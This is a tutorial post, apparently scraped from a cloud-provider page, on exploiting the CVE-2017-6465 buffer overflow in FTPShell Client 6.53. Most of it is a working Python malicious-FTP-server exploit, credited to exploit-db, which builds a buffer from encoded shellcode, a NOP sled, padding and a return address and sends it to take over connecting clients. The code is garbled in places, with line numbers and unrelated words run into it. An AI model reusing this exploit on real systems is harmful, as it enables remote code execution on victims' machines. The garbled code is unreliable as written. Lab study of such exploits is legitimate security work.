Buffer overflow utilization of cve-2017-6465 Ftpshell Client 6.53

Source: Internet
Author: User
Tags cve

Tag: CTO does not replace Python except add in link nbsp overflow

0x00. Preface

Ftpshell is a popular FTP service tool under the foreign Windows platform, up to the latest version of the client 6.53:http://www.ftpshell.com/downloadclient.htm#

Lab Environment: VMWare + WinXP SP3 EN

Vulnerable App get Address: http://www.ftpshell.com/downloadclient.htm#

0x01. Using

This buffer overflow vulnerability occurs when the client initializes the authentication connection phase with the FTP server, and first installs the Ftpshell client in the experimental environment. 6.53

Here we build a malicious FTP server directly using Python code provided by explit-db

1 #Exploit Title:ftpshell Client 6.53 buffer overflow on making initial connection2 #date:2017-03-043 #Exploit author:peter Baris4 #Vendor homepage:http://www.saptech-erp.com.au5 #Software link:http://www.ftpshell.com/downloadclient.htm6 #version:windows Server R2 x647 #tested On:windows Server R2 Standard x648 #cve:cve-2017-64659 #2017-03-04:software Vendor notifiedTen #2017-03-06:no reply One #2017-03-06:publishing A  - ImportSocket - ImportSYS the   -Shell= ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" + "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37" A "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48" at "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48" - "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" - "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48" - "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" - "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48" in "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43" - "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57" to "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a" + "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b" - "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53" the "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37" * "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49" $ "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"Panax Notoginseng "\x4e\x36\x43\x46\x42\x50\x5a")#replace it with a pop-up calc.exe shellcode. -   thePort = 21 +   A Try: thes =Socket.socket (socket.af_inet, socket. SOCK_STREAM) +S.bind (("0.0.0.0", port))#bind to Port 21 -S.listen (5)#Turn on FTP service monitoring $         Print("[i] FTP server started on port:"+STR (Port) +"\ r \ n") $ except: -         Print("[!] Failed to bind the server to port:"+STR (Port) +"\ r \ n") -   the   - #004B95DC in Ftpshell.exe PUSH ESI; RETNWuyiEIP ="\xdc\x95\x4b"    #This address can still be used in WinXP SP3 en theNops ="\x90"*8 -Junk ="A"* (400-len (Nops)-Len (shell)) WuBuffer = Nops + Shell + junk + EIP#constructs a malicious buffer structure -   About  whileTrue: $conn, addr =s.accept () -Conn.send ('Welcome to your unfriendly FTP server\r\n') -     Print(CONN.RECV (1024)) -Conn.send ("331 ok\r\n") A     Print(CONN.RECV (1024)) +Conn.send ('ok\r\n') the     Print(CONN.RECV (1024)) -Conn.send ('"'+buffer+'" is current directory\r\n')#Send malicious buffer structure

Execute script, start service

The victim machine Ftpshell Client Connection Malicious FTP server, can find the client immediately error, Shellcode is executed

Note: I did not experiment in Win2008 SP2

0x02. Reference links

exploit-db:https://www.exploit-db.com/exploits/41511/

Buffer overflow utilization of cve-2017-6465 Ftpshell Client 6.53

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.